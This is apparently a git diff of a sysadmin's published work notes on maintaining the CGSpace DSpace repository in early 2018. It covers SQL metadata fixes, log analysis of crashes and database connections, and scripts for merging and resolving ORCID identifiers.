-----------------+--------------------------------------+------------
Duncan, Alan J. | 5ff35043-942e-4d0a-b377-4daed6e3c1a3 | 600
(8 rows)
dspace=# begin;
dspace=# update metadatavalue set text_value=&#39;Duncan, Alan&#39;, authority=&#39;a6486522-b08a-4f7a-84f9-3a73ce56034d&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Duncan, Alan%&#39;;
UPDATE 216
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Duncan, Alan%&#39;;
text_value | authority | confidence
--------------+--------------------------------------+------------
Duncan, Alan | a6486522-b08a-4f7a-84f9-3a73ce56034d | 600
dspace=# commit;
</code></pre><ul>
<li>I see that in <a href="/cgspace-notes/2017-04/">April, 2017</a> I just used a SQL query to get a user&rsquo;s submissions by checking the <code>dc.description.provenance</code> field</li>
<li>So for Abenet, I can check her submissions in December, 2017 with:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*yabowork.*2017-12.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^Submitted.*yabowork.*2017-12.*&#39;;
</code></pre><ul>
<li>I emailed Peter to ask whether we can move DSpace Test to a new Linode server and attach 300 GB of disk space to it</li>
<li>This would be using <a href="https://www.linode.com/blockstorage">Linode&rsquo;s new block storage volumes</a></li>
</ul>
<pre tabindex="0"><code>Caused by: java.net.SocketException: Socket closed
</code></pre><ul>
<li>Could be because of the <code>removeAbandoned=&quot;true&quot;</code> that I enabled in the JDBC connection pool last week?</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;java.net.SocketException: Socket closed&quot; dspace.log.2018-02-*
<pre tabindex="0"><code>$ grep -c &#34;java.net.SocketException: Socket closed&#34; dspace.log.2018-02-*
dspace.log.2018-02-01:0
dspace.log.2018-02-02:0
dspace.log.2018-02-03:0
</code></pre>
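<ul>
<li>For reference, a sketch of how that abandoned-connection handling is configured in a Tomcat JDBC pool (the timeout value here is illustrative):</li>
</ul>
<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspaceWeb&#34; type=&#34;javax.sql.DataSource&#34; auth=&#34;Container&#34;
          removeAbandoned=&#34;true&#34;
          removeAbandonedTimeout=&#34;60&#34;
          logAbandoned=&#34;true&#34;/&gt;
</code></pre><ul>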
<li>Sisay exported all ILRI, CIAT, etc authors from ORCID and sent a list of 600+</li>
<li>Peter combined it with mine and we have 1204 unique ORCIDs!</li>
</ul>
<pre tabindex="0"><code>$ grep -coE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv
<pre tabindex="0"><code>$ grep -coE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; CGcenter_ORCID_ID_combined.csv
1204
$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; CGcenter_ORCID_ID_combined.csv | sort | uniq | wc -l
1204
</code></pre><ul>
<li>Also, save that regex for the future because it will be very useful!</li>
<li>CIAT sent a list of their authors&rsquo; ORCIDs and combined with ours there are now 1227:</li>
</ul>
<pre tabindex="0"><code>$ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1227
</code></pre><ul>
<li>There are some formatting issues with names in Peter&rsquo;s list, so I should remember to re-generate the list of names from ORCID&rsquo;s API once we&rsquo;re done</li>
<li>The <code>dspace cleanup -v</code> currently fails on CGSpace with the following:</li>
</ul>
<pre tabindex="0"><code> - Deleting bitstream record from database (ID: 149473)
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(149473) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is to update the bitstream table, as I&rsquo;ve discovered several other times in 2016 and 2017:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);&#39;
UPDATE 1
</code></pre><ul>
<li>Then the cleanup process will continue for a while and hit another foreign key conflict, and eventually it will complete after you manually resolve them all</li>
<li>I only looked quickly in the logs but saw a bunch of database errors</li>
<li>PostgreSQL connections are currently:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | uniq -c
2 dspaceApi
1 dspaceWeb
3 dspaceApi
</code></pre><ul>
<li>I see shitloads of memory errors in Tomcat&rsquo;s logs:</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;Java heap space&quot; /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#34;Java heap space&#34; /var/log/tomcat7/catalina.out
56
</code></pre><ul>
<li>And shit tons of database connections abandoned:</li>
</ul>
<pre tabindex="0"><code># grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; /var/log/tomcat7/catalina.out
612
</code></pre><ul>
<li>I have no fucking idea why it crashed</li>
<li>The XMLUI activity looks like:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &quot;15/Feb/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;15/Feb/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
715 63.143.42.244
746 213.55.99.121
886 68.180.228.157
</code></pre><ul>
<li>I made a pull request to fix it (<a href="https://github.com/ilri/DSpace/pull/354">#354</a>)</li>
<li>I should remember to update existing values in PostgreSQL too:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;United States Agency for International Development&#39; where resource_type_id=2 and metadata_field_id=29 and text_value like &#39;%U.S. Agency for International Development%&#39;;
UPDATE 2
</code></pre><h2 id="2018-02-18">2018-02-18</h2>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | wc -l
168571
# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &#34;15/Feb/2018:(16|18|19|20)&#34; | wc -l
8188
</code></pre><ul>
<li>Only 8,000 requests during those four hours, out of 170,000 the whole day!</li>
<li>And the usage of XMLUI, REST, and OAI looks SUPER boring:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &quot;15/Feb/2018:(16|18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &#34;15/Feb/2018:(16|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
111 95.108.181.88
158 45.5.184.221
201 104.196.152.243
</code></pre>
<ul>
<li>Combined list of CGIAR author ORCID iDs is up to 1,500:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1571
</code></pre><ul>
<li>I updated my <code>resolve-orcids-from-solr.py</code> script to be able to resolve ORCID identifiers from a text file so I renamed it to <code>resolve-orcids.py</code></li>
</ul>
<pre tabindex="0"><code>Looking up the name associated with ORCID iD: 0000-0001-9634-1958
Traceback (most recent call last):
File &quot;./resolve-orcids.py&quot;, line 111, in &lt;module&gt;
File &#34;./resolve-orcids.py&#34;, line 111, in &lt;module&gt;
read_identifiers_from_file()
File &quot;./resolve-orcids.py&quot;, line 37, in read_identifiers_from_file
File &#34;./resolve-orcids.py&#34;, line 37, in read_identifiers_from_file
resolve_orcid_identifiers(orcids)
File &quot;./resolve-orcids.py&quot;, line 65, in resolve_orcid_identifiers
family_name = data['name']['family-name']['value']
TypeError: 'NoneType' object is not subscriptable
File &#34;./resolve-orcids.py&#34;, line 65, in resolve_orcid_identifiers
family_name = data[&#39;name&#39;][&#39;family-name&#39;][&#39;value&#39;]
TypeError: &#39;NoneType&#39; object is not subscriptable
</code></pre><ul>
<li>According to ORCID that identifier&rsquo;s family-name is null so that sucks</li>
<li>I fixed the script so that it checks if the family name is null</li>
@ -706,13 +705,13 @@ TypeError: 'NoneType' object is not subscriptable
</ul>
<pre tabindex="0"><code>Looking up the name associated with ORCID iD: 0000-0002-1300-3636
Traceback (most recent call last):
File &quot;./resolve-orcids.py&quot;, line 117, in &lt;module&gt;
File &#34;./resolve-orcids.py&#34;, line 117, in &lt;module&gt;
read_identifiers_from_file()
File &quot;./resolve-orcids.py&quot;, line 37, in read_identifiers_from_file
File &#34;./resolve-orcids.py&#34;, line 37, in read_identifiers_from_file
resolve_orcid_identifiers(orcids)
File &quot;./resolve-orcids.py&quot;, line 65, in resolve_orcid_identifiers
if data['name']['given-names']:
TypeError: 'NoneType' object is not subscriptable
File &#34;./resolve-orcids.py&#34;, line 65, in resolve_orcid_identifiers
if data[&#39;name&#39;][&#39;given-names&#39;]:
TypeError: &#39;NoneType&#39; object is not subscriptable
</code></pre><ul>
<li>According to ORCID that identifier&rsquo;s entire name block is null!</li>
</ul>
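<ul>
<li>A minimal sketch of a null-safe version of that lookup, assuming the ORCID v2.1 public API layout implied by the tracebacks above (this is not the actual <code>resolve-orcids.py</code>, and the credit-name preference is the one described below):</li>
</ul>
<pre tabindex="0"><code>import requests

def resolve_orcid_name(orcid):
    # assumes the ORCID v2.1 public API person endpoint
    url = f'https://pub.orcid.org/v2.1/{orcid}/person'
    data = requests.get(url, headers={'Accept': 'application/json'}).json()

    name = data.get('name')
    if name is None:
        return None  # the entire name block is null, like 0000-0002-1300-3636
    # prefer credit-name when present, then fall back to given + family
    credit_name = name.get('credit-name')
    if credit_name and credit_name.get('value'):
        return credit_name['value']
    given = name.get('given-names') or {}
    family = name.get('family-name') or {}
    parts = [given.get('value'), family.get('value')]
    return ' '.join(p for p in parts if p) or None
</code></pre>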
@ -722,14 +721,14 @@ TypeError: 'NoneType' object is not subscriptable
<li>Discuss some of the issues with null values and poor-quality names in some ORCID identifiers with Abenet and I think we&rsquo;ll now only use ORCID iDs that have been sent to us by partners, not those extracted via keyword searches on orcid.org</li>
<li>This should be the version we use (the existing controlled vocabulary generated from CGSpace&rsquo;s Solr authority core plus the IDs sent to us so far by partners):</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; 2018-02-20-combined.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; 2018-02-20-combined.txt
</code></pre><ul>
<li>I updated the <code>resolve-orcids.py</code> to use the &ldquo;credit-name&rdquo; if it exists in a profile, falling back to &ldquo;given-names&rdquo; + &ldquo;family-name&rdquo;</li>
<li>Also, I added color-coded output to the debug messages and added a &ldquo;quiet&rdquo; mode that suppresses the normal behavior of printing results to the screen</li>
<li>I&rsquo;m using this as the test input for <code>resolve-orcids.py</code>:</li>
</ul>
<pre tabindex="0"><code>$ cat orcid-test-values.txt
# valid identifier with 'given-names' and 'family-name'
# valid identifier with &#39;given-names&#39; and &#39;family-name&#39;
0000-0001-5019-1368
# duplicate identifier
@ -738,16 +737,16 @@ TypeError: 'NoneType' object is not subscriptable
# invalid identifier
0000-0001-9634-19580
# has a 'credit-name' value we should prefer
# has a &#39;credit-name&#39; value we should prefer
0000-0002-1735-7458
# has a blank 'credit-name' value
# has a blank &#39;credit-name&#39; value
0000-0001-5199-5528
# has a null 'name' object
# has a null &#39;name&#39; object
0000-0002-1300-3636
# has a null 'family-name' value
# has a null &#39;family-name&#39; value
0000-0001-9634-1958
# missing ORCID identifier
@ -770,7 +769,7 @@ TypeError: 'NoneType' object is not subscriptable
<li>It looks like Sisay restarted Tomcat because I was offline</li>
<li>There was absolutely nothing interesting going on at 13:00 on the server, WTF?</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log | grep -E &quot;22/Feb/2018:13&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># cat /var/log/nginx/*.log | grep -E &#34;22/Feb/2018:13&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
55 192.99.39.235
60 207.46.13.26
62 40.77.167.38
@ -784,7 +783,7 @@ TypeError: 'NoneType' object is not subscriptable
</code></pre><ul>
<li>Otherwise there was pretty normal traffic the rest of the day:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;22/Feb/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;22/Feb/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
839 216.244.66.245
1074 68.180.228.117
1114 157.55.39.100
@ -798,9 +797,9 @@ TypeError: 'NoneType' object is not subscriptable
</code></pre><ul>
<li>So I don&rsquo;t see any definite cause for this crash, but I do see a shit ton of abandoned PostgreSQL connections today around 1PM!</li>
</ul>
<pre tabindex="0"><code># grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; /var/log/tomcat7/catalina.out
729
# grep 'Feb 22, 2018 1' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
# grep &#39;Feb 22, 2018 1&#39; /var/log/tomcat7/catalina.out | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
519
</code></pre><ul>
<li>I think the <code>removeAbandonedTimeout</code> might still be too low (I increased it from 60 to 90 seconds last week)</li>
@ -820,12 +819,12 @@ TypeError: 'NoneType' object is not subscriptable
<li>A few days ago Abenet sent me the list of ORCID iDs from CCAFS</li>
<li>We currently have 988 unique identifiers:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
988
</code></pre><ul>
<li>After adding the ones from CCAFS we now have 1004:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1004
</code></pre><ul>
<li>I will add them to DSpace Test but Abenet says she&rsquo;s still waiting to send us ILRI&rsquo;s list</li>
@ -853,7 +852,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
<li>The query in Solr would simply be <code>orcid_id:*</code></li>
<li>Assuming I know of an authority record with <code>id:d7ef744b-bbd4-4171-b449-00e37e1b776f</code>, I could then query PostgreSQL for all metadata records using that authority</li>
</ul>
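<ul>
<li>For the Solr half, a minimal sketch of pulling those pairs out of the authority core (assuming the core is named <code>authority</code> and its documents expose <code>id</code> and <code>orcid_id</code> fields):</li>
</ul>
<pre tabindex="0"><code>import requests

# query the authority core for all records that have an ORCID iD
params = {'q': 'orcid_id:*', 'fl': 'id,orcid_id', 'rows': 10000, 'wt': 'json'}
res = requests.get('http://localhost:8081/solr/authority/select', params=params)
for doc in res.json()['response']['docs']:
    print(doc['id'], doc['orcid_id'])
</code></pre>
<ul>
<li>&hellip;and then, for a given authority <code>id</code>, the PostgreSQL query:</li>
</ul>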
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and authority='d7ef744b-bbd4-4171-b449-00e37e1b776f';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and authority=&#39;d7ef744b-bbd4-4171-b449-00e37e1b776f&#39;;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+---------------------------+-----------+-------+--------------------------------------+------------+------------------
2726830 | 77710 | 3 | Rodríguez Chalarca, Jairo | | 2 | d7ef744b-bbd4-4171-b449-00e37e1b776f | 600 | 2
@ -896,18 +895,18 @@ Nor Azwadi: 0000-0001-9634-1958
<li>I need to see which SQL queries are run during that time</li>
<li>And only a few hours after I disabled the <code>removeAbandoned</code> thing CGSpace went down and lo and behold, there were 264 connections, most of which were idle:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
279 dspaceWeb
$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c &quot;idle in transaction&quot;
$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c &#34;idle in transaction&#34;
218
</code></pre><ul>
<li>So I&rsquo;m re-enabling the <code>removeAbandoned</code> setting</li>
<li>I grabbed a snapshot of the active connections in <code>pg_stat_activity</code> for all queries running longer than 2 minutes:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (SELECT now() - query_start as &quot;runtime&quot;, application_name, usename, datname, waiting, state, query
<pre tabindex="0"><code>dspace=# \copy (SELECT now() - query_start as &#34;runtime&#34;, application_name, usename, datname, waiting, state, query
FROM pg_stat_activity
WHERE now() - query_start &gt; '2 minutes'::interval
WHERE now() - query_start &gt; &#39;2 minutes&#39;::interval
ORDER BY runtime DESC) to /tmp/2018-02-27-postgresql.txt
COPY 263
</code></pre><ul>
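<li>A sketch of automating that snapshot so it can run from cron while I debug the connection pool (same query as the <code>\copy</code> above, via psycopg2; the output path is just an example):</li>
</ul>
<pre tabindex="0"><code>import datetime
import psycopg2

conn = psycopg2.connect('dbname=dspace user=postgres host=localhost')
cursor = conn.cursor()
# same filter as the \copy above: queries running longer than two minutes
cursor.execute(
    'SELECT now() - query_start AS runtime, application_name, usename, '
    'datname, waiting, state, query '
    'FROM pg_stat_activity '
    'WHERE now() - query_start &gt; %s::interval '
    'ORDER BY runtime DESC',
    ('2 minutes',))
stamp = datetime.datetime.now().strftime('%Y-%m-%d-%H%M%S')
with open(f'/tmp/{stamp}-postgresql.txt', 'w') as snapshot:
    for row in cursor.fetchall():
        snapshot.write('\t'.join(str(col) for col in row) + '\n')
</code></pre><ul>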
@ -936,7 +935,7 @@ COPY 263
<li>CGSpace crashed today, the first HTTP 499 in nginx&rsquo;s access.log was around 09:12</li>
<li>There&rsquo;s nothing interesting going on in nginx&rsquo;s logs around that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;28/Feb/2018:09:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Feb/2018:09:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
65 197.210.168.174
74 213.55.99.121
74 66.249.66.90
@ -955,7 +954,7 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
</code></pre><ul>
<li>Memory issues seem to be common this month:</li>
</ul>
<pre tabindex="0"><code>$ grep -c 'nested exception is java.lang.OutOfMemoryError: Java heap space' dspace.log.2018-02-*
<pre tabindex="0"><code>$ grep -c &#39;nested exception is java.lang.OutOfMemoryError: Java heap space&#39; dspace.log.2018-02-*
dspace.log.2018-02-01:0
dspace.log.2018-02-02:0
dspace.log.2018-02-03:0
@ -987,7 +986,7 @@ dspace.log.2018-02-28:1
</code></pre><ul>
<li>Top ten users by session during the first twenty minutes of 9AM:</li>
</ul>
<pre tabindex="0"><code>$ grep -E '2018-02-28 09:(0|1)' dspace.log.2018-02-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code>$ grep -E &#39;2018-02-28 09:(0|1)&#39; dspace.log.2018-02-28 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq -c | sort -n | tail -n 10
18 session_id=F2DFF64D3D707CD66AE3A873CEC80C49
19 session_id=92E61C64A79F0812BE62A3882DA8F4BA
21 session_id=57417F5CB2F9E3871E609CEEBF4E001F
@ -1006,7 +1005,7 @@ dspace.log.2018-02-28:1
<li>I think I&rsquo;ll increase the JVM heap size on CGSpace from 6144m to 8192m because I&rsquo;m sick of this random crashing shit and the server has memory and I&rsquo;d rather eliminate this so I can get back to solving PostgreSQL issues and doing other real work</li>
<li>Run the few corrections from earlier this month for sponsor on CGSpace:</li>
</ul>
<pre tabindex="0"><code>cgspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
<pre tabindex="0"><code>cgspace=# update metadatavalue set text_value=&#39;United States Agency for International Development&#39; where resource_type_id=2 and metadata_field_id=29 and text_value like &#39;%U.S. Agency for International Development%&#39;;
UPDATE 3
</code></pre><ul>
<li>I finally got a CGIAR account so I logged into CGSpace with it and tried to delete my old unfinished submissions (22 of them)</li>

View File

@ -24,7 +24,7 @@ Export a CSV of the IITA community metadata for Martin Mueller
Export a CSV of the IITA community metadata for Martin Mueller
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -122,8 +122,8 @@ Export a CSV of the IITA community metadata for Martin Mueller
<li>There were some records using a non-breaking space in their AGROVOC subject field</li>
<li>I checked and tested some author corrections from Peter from last week, and then applied them on CGSpace</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3
</code></pre><ul>
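<li>For the record, a quick sketch for flagging values that contain a non-breaking space (U+00A0) like those AGROVOC subjects, by scanning a metadata CSV export (the file name is hypothetical):</li>
</ul>
<pre tabindex="0"><code>import csv

with open('2018-03-06-iita.csv') as csvfile:  # hypothetical metadata export
    for row in csv.DictReader(csvfile):
        for field, value in row.items():
            if value and '\u00a0' in value:
                print('%s: %s contains a non-breaking space' % (row['id'], field))
</code></pre><ul>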
<li>This time there were no errors in whitespace but I did have to correct one incorrectly encoded accent character</li>
<li>Add new CRP subject &ldquo;GRAIN LEGUMES AND DRYLAND CEREALS&rdquo; to <code>input-forms.xml</code> (<a href="https://github.com/ilri/DSpace/pull/358">#358</a>)</li>
@ -132,16 +132,16 @@ $ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u d
<li>Run all system updates on DSpace Test and reboot server</li>
<li>I ran the <a href="https://gist.github.com/alanorth/24d8081a5dc25e2a4e27e548e7e2389c">orcid-authority-to-item.py</a> script on CGSpace and mapped 2,864 ORCID identifiers from Solr to item metadata</li>
</ul>
<pre tabindex="0"><code>$ ./orcid-authority-to-item.py -db dspace -u dspace -p 'fuuu' -s http://localhost:8081/solr -d
<pre tabindex="0"><code>$ ./orcid-authority-to-item.py -db dspace -u dspace -p &#39;fuuu&#39; -s http://localhost:8081/solr -d
</code></pre><ul>
<li>I ran the DSpace cleanup script on CGSpace and it threw an error (as always):</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(150659) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(150659) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);&#39;
UPDATE 1
</code></pre><ul>
<li>Apply the proposed PostgreSQL indexes from DS-3636 (pull request <a href="https://github.com/DSpace/DSpace/pull/1791/">#1791</a>) on CGSpace (linode18)</li>
@ -180,7 +180,7 @@ UPDATE 1
es
(16 rows)
dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('en','EN','En','en_','EN_US','en_U','eng');
dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where resource_type_id=2 and text_lang in (&#39;en&#39;,&#39;EN&#39;,&#39;En&#39;,&#39;en_&#39;,&#39;EN_US&#39;,&#39;en_U&#39;,&#39;eng&#39;);
UPDATE 122227
dspacetest=# select distinct text_lang from metadatavalue where resource_type_id=2;
text_lang
@ -199,7 +199,7 @@ dspacetest=# select distinct text_lang from metadatavalue where resource_type_id
<li>On second inspection it looks like <code>dc.description.provenance</code> fields use the text_lang &ldquo;en&rdquo; so that&rsquo;s probably why there are over 100,000 fields changed&hellip;</li>
<li>If I skip that, there are about 2,000, which seems closer to the number of fields users have edited manually, or fucked up during CSV import, etc:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('EN','En','en_','EN_US','en_U','eng');
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where resource_type_id=2 and text_lang in (&#39;EN&#39;,&#39;En&#39;,&#39;en_&#39;,&#39;EN_US&#39;,&#39;en_U&#39;,&#39;eng&#39;);
UPDATE 2309
</code></pre><ul>
<li>I will apply this on CGSpace right now</li>
@ -207,11 +207,11 @@ UPDATE 2309
<li>Using a series of filters, flags, and GREL expressions to isolate items for a certain author, I figured out how to add ORCID identifiers to the <code>cg.creator.id</code> field</li>
<li>For example, a GREL expression in a custom text facet to get all items with <code>dc.contributor.author[en_US]</code> of a certain author with several name variations (this is how you use a logical OR in OpenRefine):</li>
</ul>
<pre tabindex="0"><code>or(value.contains('Ceballos, Hern'), value.contains('Hernández Ceballos'))
<pre tabindex="0"><code>or(value.contains(&#39;Ceballos, Hern&#39;), value.contains(&#39;Hernández Ceballos&#39;))
</code></pre><ul>
<li>Then you can flag or star matching items and then use a conditional to either set the value directly or add it to an existing value:</li>
</ul>
